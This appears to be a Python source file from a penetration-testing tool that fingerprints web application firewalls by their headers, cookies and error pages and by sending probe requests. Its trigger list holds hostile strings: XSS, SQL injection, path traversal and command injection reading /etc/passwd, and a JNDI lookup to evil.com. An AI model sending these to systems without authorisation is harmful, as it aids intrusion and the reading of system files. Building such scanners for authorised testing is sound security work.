"""WAF (Web Application Firewall) detection scanner.

Pure Python scanner that detects common WAFs by analyzing
response headers, response bodies, and behavior when sending
trigger payloads.
"""

from __future__ import annotations

import ssl
import time
import urllib.error
import urllib.request
from urllib.parse import quote, urlparse

from nee_tool.core.models import Finding, HostInfo, ScanResult, Severity
from nee_tool.scanners.base import BaseScanner, console

# WAF detection signatures
WAF_SIGNATURES = {
    "Cloudflare": {
        "headers": {
            "cf-ray": None,  # Any value = match
            "cf-cache-status": None,
            "server": "cloudflare",
        },
        "body_patterns": ["cloudflare", "attention required!", "cf-error-details"],
        "cookies": ["__cfduid", "__cf_bm", "cf_clearance"],
    },
    "AWS WAF / CloudFront": {
        "headers": {
            "x-amzn-requestid": None,
            "x-amz-cf-id": None,
            "x-amz-cf-pop": None,
            "server": "cloudfront",
        },
        "body_patterns": ["aws waf", "request blocked", "x-amzn-waf"],
        "cookies": ["awsalb", "awsalbcors"],
    },
    "Akamai": {
        "headers": {
            "x-akamai-transformed": None,
            "akamai-origin-hop": None,
            "server": "akamaighost",
        },
        "body_patterns": ["akamai", "reference&#32;&#35;"],
        "cookies": ["akamai"],
    },
    "Imperva / Incapsula": {
        "headers": {
            "x-cdn": "imperva",
            "x-iinfo": None,
        },
        "body_patterns": ["incapsula", "imperva", "visitorid", "_incapsula_resource"],
        "cookies": ["incap_ses", "visid_incap", "nlbi_"],
    },
    "Sucuri": {
        "headers": {
            "x-sucuri-id": None,
            "x-sucuri-cache": None,
            "server": "sucuri",
        },
        "body_patterns": ["sucuri", "sucuri website firewall", "cloudproxy"],
        "cookies": ["sucuri_cloudproxy"],
    },
    "ModSecurity": {
        "headers": {
            "server": "mod_security",
        },
        "body_patterns": [
            "mod_security", "modsecurity", "noyb",
            "this error was generated by mod_security",
            "not acceptable",
            "method not implemented",
        ],
        "cookies": [],
    },
    "F5 BIG-IP ASM": {
        "headers": {
            "x-wa-info": None,
            "server": "big-ip",
        },
        "body_patterns": [
            "the requested url was rejected",
            "please consult with your administrator",
            "your support id is",
            "bigipserver",
        ],
        "cookies": ["ts", "bigipserver", "f5_cspm"],
    },
    "Barracuda": {
        "headers": {
            "server": "barracuda",
        },
        "body_patterns": ["barracuda", "barra_counter_session"],
        "cookies": ["barra_counter_session", "bNVR_"],
    },
    "Fortinet / FortiWeb": {
        "headers": {
            "server": "fortiweb",
        },
        "body_patterns": ["fortigate", "fortiweb", ".fgtauth"],
        "cookies": ["FORTIWAFSID"],
    },
    "DDoS-Guard": {
        "headers": {
            "server": "ddos-guard",
        },
        "body_patterns": ["ddos-guard"],
        "cookies": ["__ddg"],
    },
    "Wordfence (WordPress)": {
        "headers": {},
        "body_patterns": [
            "wordfence", "this response was generated by wordfence",
            "your access to this site has been limited",
        ],
        "cookies": ["wfwaf-authcookie"],
    },
}

# Payloads that typically trigger WAF responses
WAF_TRIGGER_PAYLOADS = [
    # XSS payloads
    "<script>alert(1)</script>",
    '"><img src=x onerror=alert(1)>',
    # SQL injection payloads
    "' OR 1=1 --",
    "1 UNION SELECT NULL--",
    # Path traversal
    "../../etc/passwd",
    # Command injection
    "; cat /etc/passwd",
    # Common attack patterns
    "${jndi:ldap://evil.com}",
]

RATE_LIMIT_DELAY = 0.5


class WAFDetectScanner(BaseScanner):
    name = "waf_detect"
    description = "WAF-Erkennung (Cloudflare, AWS, Akamai, etc.)"
    required_tools: list[str] = []  # Pure Python

    def __init__(self, config):
        super().__init__(config)
        self._last_request: dict[str, float] = {}

    def _rate_limit(self, host: str) -> None:
        now = time.time()
        last = self._last_request.get(host, 0)
        wait = RATE_LIMIT_DELAY - (now - last)
        if wait > 0:
            time.sleep(wait)
        self._last_request[host] = time.time()

    def _request(
        self, url: str, timeout: int = 10
    ) -> tuple[int, dict[str, str], str, list[str]]:
        """Make HTTP request, return (status, headers, body, cookies)."""
        parsed = urlparse(url)
        self._rate_limit(parsed.hostname or "")

        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE

        req = urllib.request.Request(url, headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
            "Accept": "text/html,application/xhtml+xml,*/*",
        })

        try:
            response = urllib.request.urlopen(req, timeout=timeout, context=ctx)
            headers = {k.lower(): v for k, v in response.headers.items()}
            body = response.read(10000).decode("utf-8", errors="replace")
            cookies = [
                v.split(";")[0]
                for k, v in response.headers.items()
                if k.lower() == "set-cookie"
            ]
            return response.status, headers, body, cookies
        except urllib.error.HTTPError as e:
            headers = {k.lower(): v for k, v in e.headers.items()} if e.headers else {}
            body = ""
            cookies = []
            try:
                body = e.read(10000).decode("utf-8", errors="replace")
            except Exception:
                pass
            try:
                cookies = [
                    v.split(";")[0]
                    for k, v in e.headers.items()
                    if k.lower() == "set-cookie"
                ]
            except Exception:
                pass
            return e.code, headers, body, cookies
        except Exception:
            return 0, {}, "", []

    def _detect_waf(
        self,
        headers: dict[str, str],
        body: str,
        cookies: list[str],
    ) -> list[str]:
        """Check response against WAF signatures, return list of detected WAFs."""
        detected = []
        body_lower = body.lower()
        cookies_str = " ".join(cookies).lower()

        for waf_name, sigs in WAF_SIGNATURES.items():
            score = 0

            # Check headers
            for header_name, expected_value in sigs.get("headers", {}).items():
                header_val = headers.get(header_name.lower(), "")
                if header_val:
                    if expected_value is None:
                        score += 2  # Header exists
                    elif expected_value.lower() in header_val.lower():
                        score += 3  # Header value matches

            # Check body patterns
            for pattern in sigs.get("body_patterns", []):
                if pattern.lower() in body_lower:
                    score += 2

            # Check cookies
            for cookie_pattern in sigs.get("cookies", []):
                if cookie_pattern.lower() in cookies_str:
                    score += 2

            if score >= 2:
                detected.append(waf_name)

        return detected

    def scan(self, target: str, previous_results: list[ScanResult]) -> ScanResult:
        web_hosts: set[str] = set()
        for prev in previous_results:
            for host in prev.hosts:
                if host.is_web:
                    web_hosts.add(host.hostname or host.ip)

        if not web_hosts:
            web_hosts = {target}

        findings: list[Finding] = []
        hosts_scanned: set[str] = set()

        console.print(f"    [dim]Prüfe {len(web_hosts)} Hosts auf WAF...[/dim]")

        for hostname in sorted(web_hosts):
            hosts_scanned.add(hostname)
            detected_wafs: set[str] = set()
            evidence_parts: list[str] = []

            for scheme in ["https", "http"]:
                # Step 1: Normal request — check headers/cookies
                url = f"{scheme}://{hostname}/"
                status, headers, body, cookies = self._request(url)

                if status == 0:
                    continue

                wafs = self._detect_waf(headers, body, cookies)
                if wafs:
                    detected_wafs.update(wafs)
                    evidence_parts.append(f"Normal request to {url}: HTTP {status}")
                    for h_name, h_val in headers.items():
                        if any(
                            sig_h.lower() == h_name
                            for sigs in WAF_SIGNATURES.values()
                            for sig_h in sigs.get("headers", {})
                        ):
                            evidence_parts.append(f"  Header: {h_name}: {h_val}")

                # Step 2: Send trigger payloads
                for payload in WAF_TRIGGER_PAYLOADS[:3]:  # Limit to avoid blocking
                    trigger_url = f"{scheme}://{hostname}/?test={quote(payload)}"
                    t_status, t_headers, t_body, t_cookies = self._request(trigger_url)

                    if t_status == 0:
                        continue

                    # WAF typically returns 403, 406, 429, or custom error pages
                    if t_status in (403, 406, 429, 503):
                        t_wafs = self._detect_waf(t_headers, t_body, t_cookies)
                        if t_wafs:
                            detected_wafs.update(t_wafs)
                            evidence_parts.append(
                                f"Trigger payload → HTTP {t_status}: {payload[:30]}..."
                            )

                if detected_wafs:
                    break  # Found WAF on this scheme, no need to try other

            if detected_wafs:
                waf_list = ", ".join(sorted(detected_wafs))
                findings.append(Finding(
                    title=f"WAF erkannt: {waf_list} ({hostname})",
                    severity=Severity.INFO,
                    description=(
                        f"Auf {hostname} wurde eine Web Application Firewall erkannt: "
                        f"{waf_list}. Dies beeinflusst die Angriffsstrategie — "
                        "bestimmte Payloads werden möglicherweise blockiert und "
                        "WAF-Bypass-Techniken können erforderlich sein."
                    ),
                    evidence="\n".join(evidence_parts) if evidence_parts else f"WAF detected: {waf_list}",
                    recommendation=(
                        "Informativ: WAF-Erkennung hilft bei der Planung von Tests.\n"
                        "1. WAF-Bypass-Techniken in Betracht ziehen\n"
                        "2. Payloads an den WAF-Typ anpassen\n"
                        "3. Rate-Limiting beachten um IP-Sperren zu vermeiden"
                    ),
                    tags=["waf-detection"] + [w.lower().replace(" ", "-").replace("/", "-") for w in detected_wafs],
                ))
            else:
                # No WAF detected — also useful info
                findings.append(Finding(
                    title=f"Kein WAF erkannt ({hostname})",
                    severity=Severity.INFO,
                    description=(
                        f"Auf {hostname} wurde keine Web Application Firewall erkannt. "
                        "Die Anwendung ist möglicherweise ohne zusätzlichen WAF-Schutz exponiert."
                    ),
                    evidence=f"Host: {hostname}\nTrigger-Payloads getestet: {min(len(WAF_TRIGGER_PAYLOADS), 3)}",
                    recommendation=(
                        "1. WAF-Einsatz in Betracht ziehen (z.B. Cloudflare, AWS WAF)\n"
                        "2. ModSecurity als kostenlosen WAF-Schutz evaluieren\n"
                        "3. Rate-Limiting auf Webserver-Ebene implementieren"
                    ),
                    tags=["waf-detection", "no-waf"],
                ))

        console.print(f"    [dim]{len([f for f in findings if 'no-waf' not in f.tags])} WAFs erkannt[/dim]")

        return ScanResult(
            scanner_name=self.name,
            findings=findings,
            hosts=[HostInfo(hostname=h, is_web=True) for h in hosts_scanned],
            data={"hosts_scanned": len(hosts_scanned)},
        )
